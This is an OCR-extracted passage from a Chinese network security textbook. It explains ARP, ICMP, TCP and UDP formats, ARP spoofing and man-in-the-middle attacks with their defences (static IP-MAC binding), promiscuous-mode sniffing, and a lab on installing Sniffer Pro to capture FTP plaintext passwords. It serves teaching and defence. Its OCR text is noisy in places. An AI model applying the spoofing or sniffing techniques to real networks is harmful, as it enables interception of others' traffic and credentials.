地 址 获得 其 MAC 地 址 ,这 就 是 ARP 协议 要 做 的 事情 。 所 谓 地 址 解析 (Address Resolution) ， 
就 是 主机 在 发 送 数据 帧 前 将 目的 IP 地 址 转换 成 目的 主机 的 MAC 地 址 的 过 程 。 

另外 , 当 发 送 主机 和 目的 主机 不 在 同一 个 局 域 网 中 时 ,即便 知道 目的 主机 的 MAC 地 
址 ,两 者 也 不 能 直接 通信 ,必须 经 过 路 由 转发 才 可 以 。 所 以 此 时 ,发 送 主机 通过 ARP 协议 
获得 的 将 不 是 目的 主机 的 真实 MAC 地 址 ,而 是 一 台 可 以 通 往 局 域 网 外 的 路 由 器 的 某 个 端 
口 的 MAC 地 址 。 于 是 ,此 后 发 送 主机 发 往 目 的 主机 的 所 有 帧 都 将 发 往 该 路 由 器 ,通过 它 向 
外 发 送 , 这 种 情况 称 为 ARP 代理 (ARP Proxy) 。 

(1) ARP 的 工作 原理 

在 每 台 安 装 有 TCP/IP 协议 的 计算 机 中 都 有 一 个 ARP 缓存 表 . 表 中 的 卫 地 址 与 MAC 
地 址 是 一 一 对 应 的 。 

下 面 以 主机 A(192. 168. 1.5) 向 主机 B(192. 168. 1. 1) 发 送 数 据 为 例 说 明 ARP 的 工作 
原理 。 
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@ 当 发 送 数据 时 ,主机 A 会 在 自己 的 ARP 缓存 表 中 寻找 是 否 有 目的 主机 IP 地 址 。 

@ 如 果 找 到 了 ,也 就 知道 了 目标 MAC 地 址 ,直接 把 目标 MAC 地 址 写 人 帧 里 面 , 就 可 
以 发 送 了 。 

@ 如 果 在 ARP 缓存 表 中 没有 找到 目的 IP 地 址 ,主机 A 就 会 在 网 络 上 发 送 一 个 广播 : 
“我 是 192. 168. 1. 5 ,我 的 MAC 地 址 是 00-aa-00-66-d8-13 ,请 问 IP 地 址 为 192. 168. 1. 1 的 
MAC 地 址 是 什么 ?” 

@ 网 络 上 其 他 主机 并 不 响应 ARP 询问 ,只 有 主机 B 接收 到 这 个 帧 时 , 才 向 主机 A 做 
出 这 样 的 回应 :“192. 168. 1. 1 的 MAC 地 址 是 00-aa-00-62-c6-09”。 

加 这 样 ,主机 A 就 知道 了 主机 B 的 MAC 地 址 , 它 就 可 以 向 主机 B 发 送信 息 了 。 

@ 主机 A 和 主机 B 还 同时 都 更 新 了 自己 的 ARP 缓存 表 ( 因 为 主机 A 在 询问 的 时 候 把 
自己 的 IP 和 MAC 地 址 一 起 告诉 了 主机 B) ,下 次 主机 A 再 向 主机 B 或 者 主机 也 向 主机 A 
发 送信 息 时 ,直接 从 各 自 的 ARP 缓存 表 里 查找 就 可 以 了 。 

@ 〇 ARP 缓存 表 采 用 了 老化 机 制 ( 即 设置 了 生存 时 间 TTL) ,在 一 段 时 间 内 (Windows 
系统 这 个 时 间 为 2min, 而 Cisco 路 由 器 的 这 个 时 间 为 5min) 如 果 表 中 的 某 一 行内 容 (IP 地 
址 与 MAC 地 址 的 映射 关系 ?没有 被 使 用 过 ,该 行内 容 就 会 被 删除 ,这样 可 以 大 大 减少 ARP 
缓存 表 的 长 度 ,加快 查询 速度 。 

(2) ARP 数据 报 格式 

ARP 数据 报 格式 如 图 3-5 所 示 。 


硬件 类 型 (2 字 节 ) 协议 类 型 (2 字 节 ) 
硬件 地 址 长 度 (1 字 节 ) 协议 地 址 长 度 (1 字 节 ) 操作 类 型 (1 请 求 2 回答 ) 
发 送 站 硬件 地 址 (6 字 节 ) 


发 送 站 协议 地 址 (4 字 节 ) 
目的 硬件 地 址 (6 字 节 ) 
目的 协议 地 址 (4 字 节 ) 
图 3-5 ARP 数据 报 格式 


各 字段 的 含义 如 下 。 

Q@ 硬件 类 型 : 占 2 字 节 ,定义 ARP 实现 在 何 种 类 型 的 网 络 上 ,以 太 网 的 硬件 类 型 值 
为 0x0001。 

@ 协议 类 型 : 占 2 字 节 ,定义 使 用 ARP 的 协议 类 型 .0x0800 表示 IPv4。 

名 硬件 地 址 长 度 : 占 1 字 节 ,以 字 节 为 单位 定义 物理 地 址 的 长 度 ,以 太 网 为 6。 

@ 协议 地 址 长 度 : 占 1 字 节 ,以 字 节 为 单位 定义 协议 地 址 的 长 度 ,IPv4 为 4。 

@@ 操作 类 型 : 占 2 字 节 ,定义 报 文 类 型 ,1 为 ARP 请 求 ,2 为 ARP 回答 ,3 为 RARP 请 
求 ,4 为 RARP 回答 。 

@ 发 送 站 硬件 地 址 :发 送 站 的 MAC 地 址 , 占 6 字 节 。 

@ 发 送 站 协议 地 址 :发送 站 的 IP 地 址 , 占 4 字 节 .RARP 请 求 中 不 填 此 字段 。 

人 @ 日 的 硬件 地 址 :接收 方 的 MAC 地 址 , 占 6 字 节 ,ARP 请 求 中 不 填 此 字段 ( 待 解析 ) 。 

@ 目的 协议 地 址 :接收 方 的 了 了 地址 , 占 4 字 节 。 
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ARP 数据 报 的 总 长 度 为 28 字 节 。 
3. ICMP 数据 报 格式 


在 任何 网 络 体系 结构 中 ,控制 功能 是 必 不 可 少 的 。 网 络 层 使 用 的 控制 协议 是 网 际 控制 
报 文 协议 (Internet Control Message Protocol,ICMP) 。ICMP 不 仅 用 于 传输 控制 报 文 ,而 
且 还 用 于 传输 差错 报 文 。 

实际 上 ,ICMP 报 文 是 作为 IP 数据 报 的 数据 部 分 而 传输 的 ,如 图 3-6 所 示 。 


图 3-6 ICMP 报 文 封装 在 IP 报 文中 传输 


ICMP 数据 报 格式 如 图 3-7 所 示 。 
0 7 15 31 
| 类 型 | 代码 | 核验 和 


图 3-7 ICMP 数据 报 格式 


当 ping 一 台 主 机 想 看 它 是 否 运 行 时 ,就 会 产生 一 条 ICMP 信息 ,日 的 主机 将 用 它 自己 
的 ICMP 信息 对 ping 请 求 做 出 回应 。 


3.3.4 传输 层 协议 格式 


传输 层 的 协议 有 TCP 协议 和 UDP 协议 。 

TCP 协议 提供 IP 环境 下 的 数据 可 靠 传 输 , 它 提供 的 服务 包括 数据 流传 送 、 可 靠 性 、 流 
量 控制 ,全 双 工 操作 和 多 路 复 用 ,是 一 种 面向 连接 的 、 端 到 端的 ,可靠 的 数据 包 传 送 协 议 ,可 
将 一 台 主 机 的 字 节 流 无 差错 地 传送 到 目的 主机 。 通 俗 地 说 , 它 是 事先 为 所 发 送 的 数据 开辟 
出 连接 好 的 通道 ,然后 再 进行 数据 发 送 。 而 UDP 协议 则 不 为 IP 提供 可 靠 性 流量 控制 或 差 
错 恢 复 功能 , 它 是 不 可 靠 的 无 连接 协议 ,不 要 求 分 组 顺序 到 达 日 的 地 。 一 般 来 说 ,TCP 协议 
对 应 的 是 可 靠 性 要 求 高 的 应 用 ,而 UDP 协议 对 应 的 则 是 可 靠 性 要 求 低 、 传 输 经 济 的 应 用 。 
TCP 协议 支持 的 应 用 层 协议 主要 有 Telnet、FTP、SMTP 等 ;UDP 协议 支持 的 应 用 层 协议 
主要 有 NFS.DNS .SNMP( 简 单 网 络 管理 协议 ) .TFTP( 简 单 文件 传输 协议 ) 等 。 

在 TCP/IP 体系 中 ,由 于 IP 是 无 连接 的 ,数据 要 经 过 若干 个 点 到 点 连接 ,不 知 会 在 什么 
地 方 存储 延迟 一 段 时 间 :也 不 知 是 否 会 突然 冒 出 来 。TCP 协议 要 解决 的 关键 问题 就 在 此 ， 
TCP 协议 采用 的 三 次 握手 机 制 、 滑 动 窗口 协议 、 确 认 与 重 传 机 制 都 与 此 有 关 。 
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1. TCP 数据 报 格式 
TCP 数据 报 格式 如 图 3-8 所 示 。 


图 3-8 TCP 数据 报 格式 


各 字段 的 含义 如 下 。 

(1) 源 端 口号 和 目的 端口 号 :各 占 16 位 ,标识 发 送 端 和 接收 端的 应 用 进程 。 这 两 个 值 
加 上 IP 首部 中 的 源 IP 地 址 和 目的 IP 地 址 ,唯一 地 确定 了 一 个 连接 。1024 以 下 的 端口 号 被 
称 为 公认 端口 (Well-Known Port) ,它们 被 保留 用 于 一 些 标准 的 服务 。 

(2) 序号 : 占 32 位 ,所 发 送 的 消息 的 第 一 字 节 的 序号 ,用 于 标识 从 TCP 发 送 端 和 TCP 
接收 端 发 送 的 数据 字 节 流 。 

(3) 确认 号 : 占 32 位 ,期 望 收 到 对 方 的 下 一 个 消息 第 一 字 节 的 序号 。 为 确认 的 一 端 所 
期 望 接收 的 下 一 个 序号 。 只 有 在 “标识 "字段 中 的 ACK 位 设置 为 1 时 .此 确认 号 才 有 效 。 

(4) 首部 长 度 : 占 4 位 :以 32 位 为 计算 单位 的 TCP 报 文 段 首部 的 长 度 。 

(5) 保留 : 占 6 位 ,为 将 来 的 应 用 而 保留 ,日 前 置 为 0。 

(6) 标识 : 占 6 位 ,有 6 个 标识 位 (以 下 是 设置 为 1 时 的 意义 ,为 0 时 相反 ) 。 

@ 紧急 位 (URG) :紧急 指针 有 效 。 

@ 确认 位 (ACK) :确认 号 有 效 。 

@ 急迫 位 (PSH) :接收 方 收 到 数据 后 ,立即 送 往 应 用 程序 。 

@ 复位 位 (RST) :复位 由 于 主机 崩溃 或 其 他 原因 而 出 现 的 错误 的 连接 。 

@ 同步 位 (SYN) :SYN 二 1、ACK 二 0 表示 连接 请 求 消 息 ,SYN=1、ACK=1 表示 同意 
建立 连接 消息 。 

@ 终止 位 (FIN) :表示 数据 已 发 送 完毕 ,要 求 释放 连接 。 

(7) 窗口 大 小 : 占 16 位 ,滑动 窗口 协议 中 的 窗口 大 小 。 

(8) 校 验 和 : 占 16 位 ,对 TCP 报 文 段 首 部 和 TCP 数据 部 分 的 校 验 。 

(9) 紧急 指针 : 占 16 位 ,当前 序号 到 紧急 数据 位 置 的 偏 移 量 。 

(10) 选项 :用 于 提供 一 种 增加 额外 设置 的 方法 ,如 连接 建立 时 ,双方 说 明 最 大 的 负载 
能 力 。 

(11) 填充 : 当 “ 选 项 "字段 长 度 不 足 32 位 时 ,需要 加 以 填充 。 

(12) 数据 :来 自 高 层 ( 即 应 用 层 ) 的 协议 数据 。 
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2. UDP 数据 报 格式 
UDP 数据 报 格式 如 图 3-9 所 示 。 


图 3-9 UDP 数据 报 格式 


各 字段 的 含义 如 下 。 

(1) 源 端 口号 和 目的 端口 号 :标识 发 送 端 和 接收 端的 应 用 进程 。 

(2) 报 文 长 度 :包括 UDP 报头 和 数据 在 内 的 报 文 长 度 值 ,以 字 节 为 单位 ,最 小 为 8。 

(3) 校 验 和 ;计算 对 象 包括 伪 协 议 头 .UDP 报头 和 数据 。 校 验 和 为 可 选 字段 ,如 果 该 字 
段 设 置 为 0, 则 表示 发 送 者 没有 为 该 UDP 数据 报 提供 校 验 和 。 伪 协议 头 主要 包括 源 IP 地 
址 \ 日 的 IP 地 址 .协议 类 型 等 来 自 IP 报头 的 字段 和 UDP 报 文 长 度 ,对 其 进行 校 验 主要 用 于 
检验 UDP 数据 报 是 否 正确 传送 到 了 目的 地 。 

用 户 数据 报 协议 UDP 建立 在 IP 协议 之 上 , 同 IP 协议 一 样 提 供 无 连接 数据 报 传输 。 相 
对 于 IP 协议 , 它 唯 一 增加 的 功能 是 提供 协议 端口 ,以 保证 进程 通信 。 

许多 基于 UDP 的 应 用 程序 在 高 可 靠 性 、 低 延迟 的 局 域 网 上 运行 很 好 ,而 一 旦 到 了 通信 
子 网 QoS( 服 务 质量 ) 很 低 的 互联 网 中 ,可 能 根本 不 能 运行 ,原因 就 在 于 UDP 不 可 靠 ,而 这 
些 程序 本 身 又 没有 做 可 靠 性 处 理 。 因 此 ,基于 UDP 的 应 用 程序 在 不 可 靠 子 网 上 必须 自己 
解决 可 靠 性 (诸如 报 文 丢 失 、 重 复 、 失 序 和 流量 控制 等 ) 问 题 。 

既然 UDP 如 此 不 可 靠 ,为 何 TCP/IP 还 要 采纳 它 ? 最 主要 的 原因 在 于 UDP 的 高 效 
率 。 在 实际 应 用 中 ,UDP 往往 面向 只 需 少 量 报 文 交 互 的 应 用 ,假如 为 此 而 建立 连接 和 撤销 
连接 ,开销 是 相当 大 的 。 在 这 种 情况 下 .使 用 UDP 就 很 有 效 了 ,即使 因 报 文 损失 而 重 传 一 
次 ,其 开销 也 比 面向 连接 的 传输 要 小 。 


3.3.5 三 次 握手 机 制 


三 次 握手 机 制 首先 要 求 对 本 次 TCP 连接 的 所 有 报 文 进行 编号 . 取 一 个 随机 值 作为 初始 
序号 。 由 于 序号 域 足够 长 ,可 以 保证 序号 循环 一 周 时 使 用 同一 序号 的 旧 报 文 早已 传输 完毕 ， 
网 络 上 也 就 不 会 出 现 关 于 同一 连接 、 同 一 序号 的 两 个 不 同 报 文 。 在 三 次 握手 机 制 的 第 一 次 
中 ,A 机 向 B 机 发 出 连接 请 求 (CR) ,其 中 包含 A 机 端的 初始 报 文 序号 (比如 X); 第 二 次 ， 
B 机 收 到 CR 后 ,发 回 连接 确认 CCC) 消息, 其 中 ,包含 B 机 端的 初始 报 文 序号 (比如 Y) ,以 及 
B 机 对 A 机 初始 序号 X 的 确认 (确认 号 为 X 十 1); 第 三 次 .A 机 向 B 机 发 送 X 十 1 序号 
数据 ,其 中 包含 对 BB 机 初始 序号 Y 的 确认 (确认 号 为 Y 十 1)。TCP 的 三 次 握手 过 程 如 
图 3-10 所 示 。 
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客户 端 服务 器 端 
连接 请 求 
(初始 序号 =X) 
(初始 序号 =X) 


确认 号 
连接 确认 
( 彻 始 序号 =Y, 确 认 号 =X+D)| 


数据 
(序号 =X+1, 确 认 号 =Y+1) 


图 3-10 TCP 的 三 次 握手 过 程 


3.3.6 ARP 其 骗 攻击 


1. ARP 欺骗 攻击 的 原理 


假设 主机 A 曾经 和 主机 B 进行 过 通信 ,主机 A 就 会 在 ARP 缓存 表 中 记录 下 主机 B 的 
IP 地 址 和 其 对 应 的 MAC 地 址 。 一 般 的 ,ARP 缓存 表 都 有 更 新 机 制 , 当 有 主机 通知 其 他 主 
机 其 MAC 地 址 更 新 时 ,会 向 其 他 主机 发 送 ARP 更 新 信息 ,以 便 这 些 主机 及 时 更 新 其 ARP 
缓存 表 。 每 台 主 机 在 收 到 ARP 数据 包 时 都 会 更 新 自己 的 ARP 缓存 表 。ARP 欺骗 攻击 的 
原理 ,就 是 通过 发 送 欺 骗 性 的 ARP 数据 包 ,致使 接收 者 收 到 欺骗 性 的 ARP 数据 包 后 ,更 新 
其 ARP 缓存 表 , 从 而 建立 错误 的 IP 地 址 与 MAC 地 址 的 对 应 关系 。 

ARP 欺骗 主要 分 为 两 种 :一 种 是 伪装 成 主机 的 ARP 欺骗 ; 另 一 种 是 伪装 成 网 关 的 
欺骗 。 

伪装 成 主机 的 ARP 欺骗 主要 是 在 局 域 网 环境 内 实现 的 。 假 设 在 同一 个 局 域 网 中 有 A、 
B.C 三 台 主 机 ,它们 的 IP 地 址 与 MAC 地 址 分 别 如 下 :A 的 为 192.168.1.1 和 AA-AA-AA- 
AA-AA-AA;B 的 为 192. 168. 1. 2 和 BB-BB-BB-BB-BB-BB;C 的 为 192. 168. 1.3 和 CC-CC- 
CC-CC-CC-CC。A 想 要 与 B 进行 直接 的 通信 ,而 C 想 要 窃取 A 所 发 给 B 的 内 容 。 这 时 ,C 
可 以 向 A 发 送 欺骗 性 的 ARP 数据 包 , 声 称 B 的 MAC 地 址 已 经 变 为 CC-CC-CC-CC-CC- 
CC。 这 样 在 A 的 ARP 缓存 表 中 将 建立 IP 地 址 192. 168. 1. 2 和 MAC 地 址 CC-CC-CC-CC- 
CC-CC 的 对 应 关系 。 于 是 A 发 给 B 的 所 有 内 容 将 被 交换 机 按照 CC-CC-CC-CC-CC-CC 的 
MAC 地 址 发 送 至 C 的 网 卡 。C 在 收 到 并 阅读 了 A 发 给 B 的 内 容 之 后 ,为 了 不 被 通信 双方 
(A 和 B) 发 现 ,可 以 将 数据 内 容 再 转发 给 B。 此 时 C 需要 将 发 送 给 B 的 数据 包 的 源 IP 地 址 
和 源 MAC 地 址 改 为 A 的 ,从 而 不 引起 B 的 怀疑 。 

当然 ,C 也 可 以 使 用 相同 的 手段 对 B 进行 ARP 欺骗 .让 B 认为 C 就 是 A。 这 样 ,A、B 
之 间 的 所 有 数据 都 经 过 了 “中 间 人 ”C。 对 于 A、B 而 言 ,已 很 难 发 现 C 的 存在 。 这 就 是 利用 
ARP 欺骗 实现 的 中 间 人 攻击 .如 图 3-11 所 示 。 

如 果 C 发 给 A 的 ARP 欺骗 数据 包 中 .所 包含 的 MAC 地 址 是 伪造 并 且 不 存在 的 , 则 
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A 机 器 更 新 后 的 ARP 缓存 表 中 ,B 的 IP 地 址 对 应 的 MAC 地 址 就 是 一 个 不 存在 的 MAC 地 
址 ,那么 A 将 和 B 通信 时 所 构造 的 数据 帧 中 ,目的 MAC 地 址 就 是 一 般 不 存在 的 MAC 地 
址 ,A、B 之 间 的 通信 也 就 无 法 进行 了 ,这 也 就 是 ARP 病毒 或 ARP 攻击 能 够 使 网 络 通信 瘫 


痪 和 中 断 的 原因 。 
及 欺骗 4, 我 是 B on 欺骗 B, 我 是 A 肪 , 
要 » 
通信 内容 和 的 通信 内 容 ” 


A C B 


图 3-11 ARP 欺骗 实现 中 间 人 攻击 


ARP 病毒 主机 或 ARP 攻击 主机 伪装 成 网 关 的 欺骗 行为 ,主要 是 针对 局 域 网 内 部 与 外 
界 通 信 的 情况 。 当 局 域 网 内 的 主机 要 与 外 网 的 主机 通信 时 ,需要 先 将 数据 包 发送 至 网 关 , 再 
传输 至 外 网 。 当 主机 A 想 要 与 外 网 的 主机 通信 , 它 向 外 传输 的 数据 包 进 行 封装 时 ,就 要 将 
数据 帧 中 的 目的 MAC 地 址 写成 网 关 的 MAC 地 址 ,这 样 数据 包 就 先 交 给 网 关 , 再 由 网 关 转 
发 到 外 网 。 如 果 局 域 网 内 的 主机 C 中 了 ARP 病毒 ,C 想 截 获 A 发 出 的 消息 内 容 ,C 就 需要 
向 A 发 送 欺 骗 性 的 ARP 包 ,声称 网 关 的 MAC 地 址 改 成 了 C 的 MAC 地 址 了 ,这 样 A 再 给 
网 关 发 送 数据 包 时 ,数据 包 就 转 给 了 病毒 主机 C ,病毒 主机 C 获得 了 A 的 通信 内 容 后 ,可 以 
再 将 数据 包 转 给 真正 的 网 关 , 最 终 也 能 实现 A 和 外 网 的 数据 传输 ,但 通信 内 容 被 C 获取 了 。 
如 果 病 毒 主机 C 不 将 数据 包 转 发 给 真正 的 网 关 , 则 A 就 不 能 与 外 界 通信 了 。 


2. ARP 欺骗 攻击 的 防范 


上 面 提 到 了 ARP 欺骗 对 通信 的 安全 造成 的 危害 ,不 仅 如 此 , 它 还 可 以 造成 局 域 网 的 内 
部 混乱 ,让 一 些 主机 之 间 无 法 正常 通信 ,让 被 欺骗 的 主机 无 法 访问 外 网 。 一 些 黑 客 工 具 不 仅 
能 够 发 送 ARP 欺骗 数据 包 , 还 能 够 通过 发 送 ARP 恢复 数据 包 来 实现 对 网 内 计算 机 是 否 能 
上 网 的 随意 控制 。 

更 具 威胁 性 的 是 ARP 病毒 ,现在 的 ARP 欺骗 病毒 可 以 使 局 域 网 内 出 现 经 常 性 掉 线 、 
IP 冲突 等 问题 ,还 会 伪造 成 网 关 使 数据 先 流 经 病毒 主机 ,实现 了 对 局 域 网 数据 包 的 嗅 探 和 
过 滤 分 析 , 并 在 过 滤 出 的 网 页 请 求 数据 包 中 插入 恶意 代码 。 如 果 收 到 该 恶意 代码 的 主机 存 
在 着 相应 的 漏洞 ,那么 该 主机 就 会 运行 恶意 代码 中 所 包含 的 恶意 程序 ,实现 主机 被 控 和 信息 
泄密 。 

可 能 通过 IDS 或 者 Antiarp 等 查找 ARP 欺骗 的 工具 检测 网 络 内 的 ARP 欺骗 攻击 , 然 
后 定位 ARP 病毒 主机 ,清除 ARP 病毒 来 彻底 解决 网 络 内 的 ARP 欺骗 行为 。 此 外 ,还 可 以 
通过 MAC 地 址 与 IP 地 址 的 双向 绑 定 ,使 ARP 欺骗 不 再 发 挥 作用 。MAC 地 址 与 IP 地 址 
的 双向 绑 定 ,是 在 内 网 的 计算 机 中 ,将 网 关 的 IP 地 址 和 真正 的 MAC 地 址 做 静态 绑 定 ; 同 时 
在 网 关 或 者 路 由 设备 中 ,将 内 网 的 IP 地 址 和 真正 的 MAC 地 址 也 做 静态 绑 定 ,这 就 可 以 实 
现 网 关 和 内 网 的 计算 机 不 再 受 ARP 欺骗 的 影响 了 。 

MAC 地 址 与 IP 地 址 双向 绑 定 方法 防止 ARP 欺骗 的 配置 过 程 如 下 。 

首先 ,在 内 网 的 计算 机 上 ,把 网 关 的 IP 地 址 和 MAC 地址 做 一 次 绑 定 ,在 Windows 中 
绑 定 过 程 可 使 用 arp 命令 : 
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arp -d * 

arp -s 网 关 IP 网 关 MAC 

arp -d * 命令 用 于 清空 arp 缓存 表 ,“arp -s 网 关 IP 网 关 MAC” 命 令 则 是 将 网 关 IP 地 
址 与 其 相应 的 MAC 地 址 进行 静态 绑 定 。 

其 次 ,在 路 由 器 或 者 网 关上 将 内 网 计算 机 的 IP 地 址 和 MAC 地 址 也 绑 定 一 次 。 


3.3.7 网 络 监听 


通常 ,一 个 网 络 接口 只 接收 以 下 两 种 数据 帧 。 

@ 帧 的 目的 MAC 地 址 与 自己 硬件 地 址 (MAC 地 址 ) 相 匹配 的 数据 帧 。 

@ 发 向 所 有 机 器 的 广播 数据 帧 。 

网 卡 负责 数据 的 收发 , 它 接 收 传输 来 的 数据 帧 ,然后 网 卡 内 的 程序 查看 数据 帧 的 目的 
MAC 地 址 ,再 根据 网 卡 驱动 程序 设置 的 接收 模式 判断 该 不 该 接收 。 如 果 接 收 则 接收 后 通 
知 CPU 进行 处 理 , 和 否则 就 丢弃 该 数据 帧 ,所 以 丢弃 的 数据 帧 直接 被 网 卡 截断 ,计算 机 根本 
不 知道 。 

网 卡通 常 有 以 下 4 种 接收 方式 。 

@ 广播 方式 :接收 网 络 中 的 广播 信息 。 

@) 组 播 方式 :接收 组 播 数据 。 

@ 直接 方式 :只 接收 帧 的 目的 MAC 地 址 与 自己 的 MAC 地 址 相 匹配 的 数据 帧 。 

@ 混杂 模式 :接收 一 切 通过 它 的 数据 ,而 不 管 该 数据 是 不 是 传 给 它 的 。 

图 3-12 为 一 个 简单 的 网 络 监听 模式 的 拓扑 图 ,机 器 A、B、C 与 集线器 HUB 连接 , 集 线 
器 HUB 通过 路 由 器 访问 外 部 网 络 。 


192. 168. 1. 254 集线器 HUB 


机 器 A 机 器 B 机 器 C 
192.168.1.11 192.168.1.12 192.168.1.13 


图 3-12 一 个 简单 的 网 络 监听 模式 的 拓扑 图 


管理 员 在 机 器 A 上 使 用 FTP 命令 向 机 器 B 进行 远程 登录 ,首先 机 器 A 上 的 管理 员 输 
人 登录 机 器 B 的 FTP 用户 名 和 密码 .经 过 应 用 层 FTP 协议 .传输 层 TCP 协议 、 网 络 层 IP 
协议 .数据 链 路 层 协议 一 层 层 地 包 右 .最 后 送 到 物理 层 . 接 下 来 数据 帧 传输 到 集线器 HUB 
上 ,然后 由 HUB 向 每 一 个 节点 广播 此 数据 帧 ,机 器 B 接收 到 由 HUB 广播 发 出 的 数据 帧 ， 
并 检查 数据 帧 中 的 目的 MAC 地 址 是 否 和 自己 的 MAC 地 址 匹配 :如果 匹配 则 对 数据 帧 进 
行 分 析 处 理 ,而 机 器 C 同时 也 收 到 了 该 数据 帧 :也 先 将 目的 MAC 地 址 和 自己 的 MAC 地 址 
进行 匹配 比较 ,如 果 不 匹配 则 丢弃 该 数据 帧 。 

而 如 果 机 器 C 的 网 卡 接收 模式 为 混杂 模式 , 则 它 将 所 有 接收 到 的 数据 帧 (不 论 目 的 
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MAC 地 址 是 否 与 自己 的 MAC 地 址 相 匹配 ?都 交 给 上 层 协议 软件 处 理 。 这 样机 器 C 就 变 成 
了 此 网 络 中 的 监听 者 .可 以 监听 机 器 A 和 机 器 B 的 通信 。 

早期 的 HUB 是 共享 介质 的 工作 方式 ,只 要 把 主机 网 卡 设置 成 混杂 模式 ,网 络 监听 就 可 
以 在 任何 接口 上 实现 。 现 在 的 网 络 基本 上 都 用 交换 机 ,交换 机 的 工作 原理 与 HUB 不同 , 普 
通 的 交换 机 工作 在 数据 链 路 层 ,交换 机 的 内 部 有 一 个 端口 和 MAC 地址 的 映射 表 , 当 有 数据 
进入 交换 机 时 ,交换 机 首先 查看 数据 帧 中 的 目的 MAC 地 址 ,然后 按照 映射 表 转发 到 相应 的 
端口 ,其 他 端口 收 不 到 数据 。 只 有 目的 MAC 地 址 是 广播 地 址 的 , 才 转 发 给 所 有 的 端口 。 因 
此 ,交换 环境 下 的 网 络 比 用 HUB 连接 的 网 络 安全 得 多 。 

现在 许多 交换 机 都 支持 端口 镜像 功能 ,能 够 把 进入 交换 机 的 所 有 数据 都 映射 到 监控 端 
口 ,同样 可 以 监听 所 有 的 数据 包 , 从 而 进行 数据 分 析 。 要 实现 这 个 功能 必须 对 交换 机 进行 端 
口 镜像 设置 才 可 以 。 

网 络 监 听 常 常 要 保存 大 量 的 信息 ,并 对 其 进行 大 量 的 整理 ,这 样 会 大 大 降低 处 于 监听 的 
主机 对 其 他 主机 的 响应 速度 ,同时 监听 程序 在 运行 时 需要 消耗 大 量 的 处 理 器 时 间 ,如果 在 此 
时 分 析 数 据 包 , 许 多 数据 包 就 会 因为 来 不 及 接收 而 被 遗漏 ,所 以 监听 程序 一 般 会 将 监听 到 的 
数据 包 先 存放 在 文件 中 , 留 作 以 后 分 析 使 用 。 


34 项 目 实 施 


3.4.1 任务 1:Sniffer 软件 的 安装 与 使 用 


1. 任务 目标 


(1) 掌握 Sniffer 软件 的 安装 与 抓 包 使 用 方法 。 
(2) 了 解 三 次 握手 过 程 。 

(3) 了 解 FTP 明文 传输 过 程 。 

2. 任务 内 容 


(1) Sniffer Pro 软件 的 安装 。 
(2) 捕获 FTP 明文 密码 。 


3. 完成 任务 所 需 的 设备 和 软件 


(1) 装 有 Windows XP/2003 操作 系统 的 PC 3 台 , 其 中 1 台 已 安装 FTP 服务 。 
(2) 集线器 HUB 1 台 , 作 为 网 络 连 接 设 备 ,直通 线 若干 根 。 

(3) Sniffer Pro 4.7.5 软件 1 套 。 

图 络 拓扑 如 图 3-12 所 示 。 


4. 任务 实施 步骤 


Sniffer Pro 软件 可 运行 在 局 域 网 的 任何 一 台 计算 机 上 ,练习 使 用 时 ,网 络 最 好 用 集线器 
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(HUB) 连 接 所 有 计算 机 在 同一 个 子 网 中 ,这 样 能 抓 到 连接 到 HUB 上 的 每 台 计 算 机 所 传输 
的 数据 包 。 


(1) Sniffer Pro 软件 的 安装 

步骤 1: 从 网 上 下 载 Sniffer Pro 软件 安装 包 , 本 项 日 以 Sniffer Pro 4.7.5 版 本 为 例 进行 

介绍 。 
步骤 2: 在 主机 C 中 ,双击 安装 包 文件 开始 安装 ,进入 如 图 3-13 所 示 的 安装 程序 界面 。 


步骤 3: 单 击 Next 按钮 ,将 安装 向 导 文 件 解 压缩 .然后 根据 安装 向 导 单 击 Next 按钮 ， 
进入 Software License Agreement 对 话 框 ,如 图 3-14 所 示 。 


Welcome to the I 
for Sniffer P， Peace ead the lolowng License Ageement Fress the PAGE DOwN hey lo ee 


th eet othe er 


De aad we ra ot raid 和 ee Porto ee Ena Ure 
Te bas woe et eon Krsocales Teo [a] Ye Erd Uer Uceree Rayeemeni 


INOTICE TO ALL USERS: CAREFULLY Ri 


OO NOY ACCEPY THE FEMME GF HS RHEE NEN A 
APPLICABLE YOU MAY RETURN THE 
TO THE PLACE OF PURCHASE FOR AFULL REFUND) 
加 


you accepl lthelene ol he precedin Licenae Agieemeni? I you choose No Sehp 
Te ee epee Geman 


ee 


图 3-13 安装 程序 界面 图 3-14 ”Software License Agreement 对 话 框 


步骤 4: 单 击 Yes 按钮 ,打开 User Information 对 话 框 ,如 图 3-15 所 示 。 

步骤 5: 单 击 Nex 按钮 ,打开 Choose Destination Location 对 话 框 ,如 图 3-16 所 示 , 软 
件 默 认 安 装 在 C:\Program Files\NATI\SnifferNT 文件 夹 中 ,如 果 要 更 改 安装 目录 ,可 单 击 
Browse 按钮 进行 更 改 ,我 们 这 里 采用 默认 安装 。 


eve orl natal snile Pro nthe lolowing ae 

To ratal oihie loder, cick Nen 

To vetal to a Gilerent lake chck Browse and select nother 
ode 


You can choore nol io matal sryle Pro by cickrg Cancel to 
Sap 


Destnaon Folder 


Comogam FlesWASralenT owe | 
ce 


图 3-15 ”User Information 对 话 框 图 3-16 ”Choose Destination Location 对 话 框 


步骤 6: 单 击 Next 按钮 .等 待 程 序 安 装 . 然 后 会 出 现 如 图 3-17 所 示 的 Sniffer Pro User 
Registration 对 话 框 ,在 该 对 话 框 的 各 文本 框 中 输入 用 户 注册 信息 。 

步骤 7: 填写 完成 后 , 单 击 “ 下 一 步 按 钮 ,软件 会 提示 输入 产品 序列 号 ,如 图 3-18 所 示 ， 
正确 输入 序列 号 ,根据 安装 向 导 提 示 单 击 “ 下 一 步 ” 按 钮 .直至 “完成 ”。 

步骤 8: 重新 启动 计算 机 , 因 Sniffer Pro 软件 是 英文 版 的 ,为 了 便于 使 用 ,可 从 网 上 下 
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载 并 安装 相应 的 汉化 包 软 件 . 最 终 完 成 Sniffer Pro 软件 的 安装 。 


mn mn 
图 3-17 用 户 注册 信息 图 3-18 输入 产品 序列 号 


(2) 捕获 FTP 明文 密码 

以 下 操作 中 ,主机 A(192. 168. 1. 11) 作 为 FTP 用 户 ,主机 B(192. 168. 1. 12) 作 为 FTP 
服务 器 ,主机 C(192. 168. 1. 13) 作 为 网 络 监听 主机 。 

步骤 1: 在 主机 C 中 ,选择 “开始 ”程序 "一 Sniffer Pro 一 Sniffer 命令 ,进入 Sniffer 程 
序 主 界面 ,如 图 3-19 所 示 ( 已 安装 汉化 包 软 件 ) 。 


